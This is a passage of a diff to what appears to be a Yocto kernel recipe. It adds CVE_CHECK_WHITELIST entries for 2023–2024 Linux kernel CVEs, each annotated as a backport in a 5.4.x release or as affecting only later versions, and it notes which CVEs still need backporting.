+CVE_CHECK_WHITELIST += "CVE-2023-38430"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-38431"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-38432"
+
+# cpe-stable-backport: Backported in 5.4.251
+CVE_CHECK_WHITELIST += "CVE-2023-3863"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-3865"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-3866"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-3867"
+
+# cpe-stable-backport: Backported in 5.4.257
+CVE_CHECK_WHITELIST += "CVE-2023-39189"
+
+# fixed-version: only affects 5.19rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-39191"
+
+# cpe-stable-backport: Backported in 5.4.257
+CVE_CHECK_WHITELIST += "CVE-2023-39192"
+
+# cpe-stable-backport: Backported in 5.4.257
+CVE_CHECK_WHITELIST += "CVE-2023-39193"
+
+# cpe-stable-backport: Backported in 5.4.255
+CVE_CHECK_WHITELIST += "CVE-2023-39194"
+
+# cpe-stable-backport: Backported in 5.4.251
+CVE_CHECK_WHITELIST += "CVE-2023-39197"
+
+# CVE-2023-39198 needs backporting (fixed from 6.5rc7)
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-4004"
+
+# CVE-2023-4010 has no known resolution
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-4015"
+
+# cpe-stable-backport: Backported in 5.4.253
+CVE_CHECK_WHITELIST += "CVE-2023-40283"
+
+# fixed-version: only affects 6.3rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-40791"
+
+# cpe-stable-backport: Backported in 5.4.253
+CVE_CHECK_WHITELIST += "CVE-2023-4128"
+
+# cpe-stable-backport: Backported in 5.4.251
+CVE_CHECK_WHITELIST += "CVE-2023-4132"
+
+# CVE-2023-4133 needs backporting (fixed from 6.3)
+
+# CVE-2023-4134 needs backporting (fixed from 6.5rc1)
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-4147"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-4155"
+
+# fixed-version: only affects 6.3rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-4194"
+
+# cpe-stable-backport: Backported in 5.4.253
+CVE_CHECK_WHITELIST += "CVE-2023-4206"
+
+# cpe-stable-backport: Backported in 5.4.253
+CVE_CHECK_WHITELIST += "CVE-2023-4207"
+
+# cpe-stable-backport: Backported in 5.4.253
+CVE_CHECK_WHITELIST += "CVE-2023-4208"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-4244"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-4273"
+
+# cpe-stable-backport: Backported in 5.4.257
+CVE_CHECK_WHITELIST += "CVE-2023-42752"
+
+# cpe-stable-backport: Backported in 5.4.257
+CVE_CHECK_WHITELIST += "CVE-2023-42753"
+
+# cpe-stable-backport: Backported in 5.4.258
+CVE_CHECK_WHITELIST += "CVE-2023-42754"
+
+# cpe-stable-backport: Backported in 5.4.257
+CVE_CHECK_WHITELIST += "CVE-2023-42755"
+
+# fixed-version: only affects 6.4rc6 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-42756"
+
+# cpe-stable-backport: Backported in 5.4.198
+CVE_CHECK_WHITELIST += "CVE-2023-4385"
+
+# cpe-stable-backport: Backported in 5.4.196
+CVE_CHECK_WHITELIST += "CVE-2023-4387"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-4389"
+
+# fixed-version: only affects 5.16rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-4394"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-44466"
+
+# cpe-stable-backport: Backported in 5.4.196
+CVE_CHECK_WHITELIST += "CVE-2023-4459"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-4563"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-4569"
+
+# cpe-stable-backport: Backported in 5.4.235
+CVE_CHECK_WHITELIST += "CVE-2023-45862"
+
+# cpe-stable-backport: Backported in 5.4.260
+CVE_CHECK_WHITELIST += "CVE-2023-45863"
+
+# cpe-stable-backport: Backported in 5.4.257
+CVE_CHECK_WHITELIST += "CVE-2023-45871"
+
+# fixed-version: only affects 6.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-45898"
+
+# fixed-version: only affects 6.4rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-4610"
+
+# fixed-version: only affects 6.4rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-4611"
+
+# CVE-2023-4622 needs backporting (fixed from 6.5rc1)
+
+# cpe-stable-backport: Backported in 5.4.257
+CVE_CHECK_WHITELIST += "CVE-2023-4623"
+
+# cpe-stable-backport: Backported in 5.4.259
+CVE_CHECK_WHITELIST += "CVE-2023-46343"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-46813"
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2023-46838"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-46862"
+
+# CVE-2023-47233 needs backporting (fixed from 6.9rc1)
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-4732"
+
+# CVE-2023-4881 needs backporting (fixed from 6.6rc1)
+
+# cpe-stable-backport: Backported in 5.4.257
+CVE_CHECK_WHITELIST += "CVE-2023-4921"
+
+# CVE-2023-50431 needs backporting (fixed from 6.8rc1)
+
+# fixed-version: only affects 6.0rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-5090"
+
+# cpe-stable-backport: Backported in 5.4.255
+CVE_CHECK_WHITELIST += "CVE-2023-51042"
+
+# cpe-stable-backport: Backported in 5.4.251
+CVE_CHECK_WHITELIST += "CVE-2023-51043"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-5158"
+
+# CVE-2023-51779 needs backporting (fixed from 6.7rc7)
+
+# cpe-stable-backport: Backported in 5.4.260
+CVE_CHECK_WHITELIST += "CVE-2023-5178"
+
+# cpe-stable-backport: Backported in 5.4.265
+CVE_CHECK_WHITELIST += "CVE-2023-51780"
+
+# cpe-stable-backport: Backported in 5.4.265
+CVE_CHECK_WHITELIST += "CVE-2023-51781"
+
+# cpe-stable-backport: Backported in 5.4.265
+CVE_CHECK_WHITELIST += "CVE-2023-51782"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-5197"
+
+# cpe-stable-backport: Backported in 5.4.267
+CVE_CHECK_WHITELIST += "CVE-2023-52340"
+
+# CVE-2023-52429 needs backporting (fixed from 6.8rc3)
+
+# fixed-version: only affects 6.5rc6 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52433"
+
+# CVE-2023-52434 needs backporting (fixed from 6.7rc6)
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52435"
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2023-52436"
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2023-52438"
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2023-52439"
+
+# fixed-version: only affects 5.17rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52440"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52441"
+
+# CVE-2023-52442 needs backporting (fixed from 6.5rc4)
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2023-52443"
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2023-52444"
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2023-52445"
+
+# fixed-version: only affects 6.2rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52446"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52447"
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2023-52448"
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2023-52449"
+
+# fixed-version: only affects 6.2rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52450"
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2023-52451"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52452"
+
+# fixed-version: only affects 6.2rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52453"
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2023-52454"
+
+# fixed-version: only affects 6.3rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52455"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52456"
+
+# fixed-version: only affects 6.1rc6 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52457"
+
+# CVE-2023-52458 needs backporting (fixed from 6.8rc1)
+
+# fixed-version: only affects 6.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52459"
+
+# fixed-version: only affects 6.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52460"
+
+# fixed-version: only affects 6.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52461"
+
+# fixed-version: only affects 5.16rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52462"
+
+# fixed-version: only affects 5.8rc7 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52463"
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2023-52464"
+
+# fixed-version: only affects 6.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52465"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52467"
+
+# fixed-version: only affects 6.4rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52468"
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2023-52469"
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2023-52470"
+
+# fixed-version: only affects 6.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52471"
+
+# fixed-version: only affects 6.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52472"
+
+# fixed-version: only affects 6.4rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52473"
+
+# CVE-2023-52474 needs backporting (fixed from 6.4rc1)
+
+# cpe-stable-backport: Backported in 5.4.259
+CVE_CHECK_WHITELIST += "CVE-2023-52475"
+
+# CVE-2023-52476 needs backporting (fixed from 6.6rc6)
+
+# cpe-stable-backport: Backported in 5.4.259
+CVE_CHECK_WHITELIST += "CVE-2023-52477"
+
+# cpe-stable-backport: Backported in 5.4.259
+CVE_CHECK_WHITELIST += "CVE-2023-52478"
+
+# CVE-2023-52479 needs backporting (fixed from 6.6rc5)
+
+# CVE-2023-52480 needs backporting (fixed from 6.6rc5)
+
+# CVE-2023-52481 needs backporting (fixed from 6.6rc5)
+
+# CVE-2023-52482 needs backporting (fixed from 6.6rc4)
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52483"
+
+# CVE-2023-52484 needs backporting (fixed from 6.6rc5)
+
+# CVE-2023-52485 needs backporting (fixed from 6.8rc1)
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52486"
+
+# fixed-version: only affects 6.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52487"
+
+# CVE-2023-52488 needs backporting (fixed from 6.8rc1)
+
+# CVE-2023-52489 needs backporting (fixed from 6.8rc1)
+
+# fixed-version: only affects 6.3rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52490"
+
+# CVE-2023-52491 needs backporting (fixed from 6.8rc1)
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52492"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52493"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52494"
+
+# fixed-version: only affects 6.3rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52495"
+
+# CVE-2023-52497 needs backporting (fixed from 6.8rc1)
+
+# CVE-2023-52498 needs backporting (fixed from 6.8rc1)
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52499"
+
+# CVE-2023-52500 needs backporting (fixed from 6.6rc2)
+
+# CVE-2023-52501 needs backporting (fixed from 6.6rc2)
+
+# cpe-stable-backport: Backported in 5.4.259
+CVE_CHECK_WHITELIST += "CVE-2023-52502"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52503"
+
+# cpe-stable-backport: Backported in 5.4.270
+CVE_CHECK_WHITELIST += "CVE-2023-52504"
+
+# fixed-version: only affects 5.18rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52505"
+
+# CVE-2023-52506 needs backporting (fixed from 6.6rc3)
+
+# cpe-stable-backport: Backported in 5.4.259
+CVE_CHECK_WHITELIST += "CVE-2023-52507"
+
+# CVE-2023-52508 needs backporting (fixed from 6.6rc2)
+
+# cpe-stable-backport: Backported in 5.4.259
+CVE_CHECK_WHITELIST += "CVE-2023-52509"
+
+# cpe-stable-backport: Backported in 5.4.259
+CVE_CHECK_WHITELIST += "CVE-2023-52510"
+
+# CVE-2023-52511 needs backporting (fixed from 6.6rc1)
+
+# fixed-version: only affects 5.18rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52512"
+
+# cpe-stable-backport: Backported in 5.4.258
+CVE_CHECK_WHITELIST += "CVE-2023-52513"
+
+# CVE-2023-52515 needs backporting (fixed from 6.6rc5)
+
+# CVE-2023-52516 needs backporting (fixed from 6.6rc1)
+
+# CVE-2023-52517 needs backporting (fixed from 6.6rc1)
+
+# fixed-version: only affects 5.16rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52518"
+
+# CVE-2023-52519 needs backporting (fixed from 6.6rc5)
+
+# fixed-version: only affects 5.14rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52520"
+
+# cpe-stable-backport: Backported in 5.4.258
+CVE_CHECK_WHITELIST += "CVE-2023-52522"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52523"
+
+# fixed-version: only affects 6.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52524"
+
+# fixed-version: only affects 6.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52525"
+
+# fixed-version: only affects 6.1rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52526"
+
+# cpe-stable-backport: Backported in 5.4.258
+CVE_CHECK_WHITELIST += "CVE-2023-52527"
+
+# cpe-stable-backport: Backported in 5.4.258
+CVE_CHECK_WHITELIST += "CVE-2023-52528"
+
+# fixed-version: only affects 5.14rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52529"
+
+# CVE-2023-52530 needs backporting (fixed from 6.6rc5)
+
+# CVE-2023-52531 needs backporting (fixed from 6.6rc5)
+
+# CVE-2023-52532 needs backporting (fixed from 6.6rc5)
+
+# CVE-2023-52559 needs backporting (fixed from 6.6rc5)
+
+# fixed-version: only affects 5.16rc5 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52560"
+
+# CVE-2023-52561 needs backporting (fixed from 6.6rc1)
+
+# fixed-version: only affects 6.0rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52562"
+
+# CVE-2023-52563 needs backporting (fixed from 6.6rc3)
+
+# fixed-version: only affects 6.5rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52564"
+
+# CVE-2023-52565 needs backporting (fixed from 6.6rc3)
+
+# cpe-stable-backport: Backported in 5.4.258
+CVE_CHECK_WHITELIST += "CVE-2023-52566"
+
+# fixed-version: only affects 6.4rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52567"
+
+# CVE-2023-52568 needs backporting (fixed from 6.6rc4)
+
+# CVE-2023-52569 needs backporting (fixed from 6.6rc2)
+
+# fixed-version: only affects 6.1rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52570"
+
+# CVE-2023-52571 needs backporting (fixed from 6.6rc4)
+
+# CVE-2023-52572 needs backporting (fixed from 6.6rc3)
+
+# cpe-stable-backport: Backported in 5.4.258
+CVE_CHECK_WHITELIST += "CVE-2023-52573"
+
+# cpe-stable-backport: Backported in 5.4.258
+CVE_CHECK_WHITELIST += "CVE-2023-52574"
+
+# fixed-version: only affects 6.5rc6 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52575"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52576"
+
+# fixed-version: only affects 6.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52577"
+
+# cpe-stable-backport: Backported in 5.4.258
+CVE_CHECK_WHITELIST += "CVE-2023-52578"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52580"
+
+# fixed-version: only affects 6.5rc6 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52581"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52582"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52583"
+
+# CVE-2023-52584 needs backporting (fixed from 6.8rc1)
+
+# CVE-2023-52585 needs backporting (fixed from 6.8rc1)
+
+# CVE-2023-52586 needs backporting (fixed from 6.8rc1)
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52587"
+
+# CVE-2023-52588 needs backporting (fixed from 6.8rc1)
+
+# CVE-2023-52589 needs backporting (fixed from 6.8rc1)
+
+# CVE-2023-52590 needs backporting (fixed from 6.8rc1)
+
+# CVE-2023-52591 needs backporting (fixed from 6.8rc1)
+
+# CVE-2023-52593 needs backporting (fixed from 6.8rc1)
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52594"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52595"
+
+# CVE-2023-52596 needs backporting (fixed from 6.8rc1)
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52597"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52598"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52599"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52600"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52601"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52602"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52603"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52604"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52606"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52607"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52608"
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2023-52609"
+
+# CVE-2023-52610 needs backporting (fixed from 6.8rc1)
+
+# fixed-version: only affects 6.4rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52611"
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2023-52612"
+
+# fixed-version: only affects 6.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52613"
+
+# CVE-2023-52614 needs backporting (fixed from 6.8rc1)
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52615"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52616"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52617"
+
+# CVE-2023-52618 needs backporting (fixed from 6.8rc1)
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52619"
+
+# CVE-2023-52620 needs backporting (fixed from 6.4)
+
+# CVE-2023-52621 needs backporting (fixed from 6.8rc1)
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52622"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52623"
+
+# CVE-2023-52624 needs backporting (fixed from 6.8rc1)
+
+# CVE-2023-52625 needs backporting (fixed from 6.8rc1)
+
+# fixed-version: only affects 6.7rc2 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52626"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52627"
+
+# CVE-2023-52628 needs backporting (fixed from 6.6rc1)
+
+# CVE-2023-52629 needs backporting (fixed from 6.6rc1)
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52630"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52631"
+
+# CVE-2023-52632 needs backporting (fixed from 6.8rc1)
+
+# CVE-2023-52633 needs backporting (fixed from 6.8rc1)
+
+# CVE-2023-52634 needs backporting (fixed from 6.8rc1)
+
+# CVE-2023-52635 needs backporting (fixed from 6.8rc1)
+
+# fixed-version: only affects 6.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52636"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52637"
+
+# CVE-2023-52638 needs backporting (fixed from 6.8rc5)
+
+# CVE-2023-52639 needs backporting (fixed from 6.8rc4)
+
+# CVE-2023-52640 needs backporting (fixed from 6.8rc4)
+
+# CVE-2023-52641 needs backporting (fixed from 6.8rc4)
+
+# fixed-version: only affects 6.1rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-5345"
+
+# fixed-version: only affects 6.2 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-5633"
+
+# cpe-stable-backport: Backported in 5.4.259
+CVE_CHECK_WHITELIST += "CVE-2023-5717"
+
+# fixed-version: only affects 6.2rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-5972"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-6039"
+
+# cpe-stable-backport: Backported in 5.4.267
+CVE_CHECK_WHITELIST += "CVE-2023-6040"
+
+# fixed-version: only affects 6.6rc3 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-6111"
+
+# cpe-stable-backport: Backported in 5.4.263
+CVE_CHECK_WHITELIST += "CVE-2023-6121"
+
+# fixed-version: only affects 5.7rc7 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-6176"
+
+# fixed-version: only affects 6.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-6200"
+
+# CVE-2023-6238 has no known resolution
+
+# CVE-2023-6240 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.273
+CVE_CHECK_WHITELIST += "CVE-2023-6270"
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2023-6356"
+
+# fixed-version: only affects 6.1rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-6531"
+
+# CVE-2023-6535 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2023-6536"
+
+# CVE-2023-6546 needs backporting (fixed from 6.5rc7)
+
+# CVE-2023-6560 needs backporting (fixed from 6.7rc4)
+
+# cpe-stable-backport: Backported in 5.4.266
+CVE_CHECK_WHITELIST += "CVE-2023-6606"
+
+# CVE-2023-6610 needs backporting (fixed from 6.7rc7)
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-6622"
+
+# fixed-version: only affects 6.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-6679"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-6817"
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2023-6915"
+
+# cpe-stable-backport: Backported in 5.4.264
+CVE_CHECK_WHITELIST += "CVE-2023-6931"
+
+# cpe-stable-backport: Backported in 5.4.263
+CVE_CHECK_WHITELIST += "CVE-2023-6932"
+
+# cpe-stable-backport: Backported in 5.4.273
+CVE_CHECK_WHITELIST += "CVE-2023-7042"
+
+# cpe-stable-backport: Backported in 5.4.235
+CVE_CHECK_WHITELIST += "CVE-2023-7192"
+
+# fixed-version: only affects 6.5rc6 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-0193"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-0340"
+
+# fixed-version: only affects 6.2rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-0443"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-0562"
+
+# CVE-2024-0564 has no known resolution
+
+# CVE-2024-0565 needs backporting (fixed from 6.7rc6)
+
+# fixed-version: only affects 6.4rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-0582"
+
+# cpe-stable-backport: Backported in 5.4.263
+CVE_CHECK_WHITELIST += "CVE-2024-0584"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-0607"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-0639"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-0641"
+
+# cpe-stable-backport: Backported in 5.4.267
+CVE_CHECK_WHITELIST += "CVE-2024-0646"
+
+# cpe-stable-backport: Backported in 5.4.243
+CVE_CHECK_WHITELIST += "CVE-2024-0775"
+
+# cpe-stable-backport: Backported in 5.4.271
+CVE_CHECK_WHITELIST += "CVE-2024-0841"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-1085"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-1086"
+
+# CVE-2024-1151 needs backporting (fixed from 6.8rc5)
+
+# CVE-2024-1312 needs backporting (fixed from 6.5rc4)
+
+# CVE-2024-21803 has no known resolution
+
+# CVE-2024-2193 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.273
+CVE_CHECK_WHITELIST += "CVE-2024-22099"
+
+# CVE-2024-22386 has no known resolution
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-22705"
+
+# cpe-stable-backport: Backported in 5.4.255
+CVE_CHECK_WHITELIST += "CVE-2024-23196"
+
+# CVE-2024-23307 needs backporting (fixed from 6.9rc1)
+
+# CVE-2024-23848 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-23849"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-23850"
+
+# CVE-2024-23851 needs backporting (fixed from 6.8rc3)
+
+# CVE-2024-24855 needs backporting (fixed from 6.5rc2)
+
+# CVE-2024-24857 has no known resolution
+
+# CVE-2024-24858 has no known resolution
+
+# CVE-2024-24859 has no known resolution
+
+# CVE-2024-24860 needs backporting (fixed from 6.8rc1)
+
+# CVE-2024-24861 needs backporting (fixed from 6.9rc1)
+
+# CVE-2024-24864 has no known resolution
+
+# CVE-2024-25739 has no known resolution
+
+# CVE-2024-25740 has no known resolution
+
+# CVE-2024-25741 has no known resolution
+
+# CVE-2024-25744 needs backporting (fixed from 6.7rc5)
+
+# fixed-version: only affects 6.5rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26581"
+
+# fixed-version: only affects 6.0rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26582"
+
+# fixed-version: only affects 5.7 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26583"
+
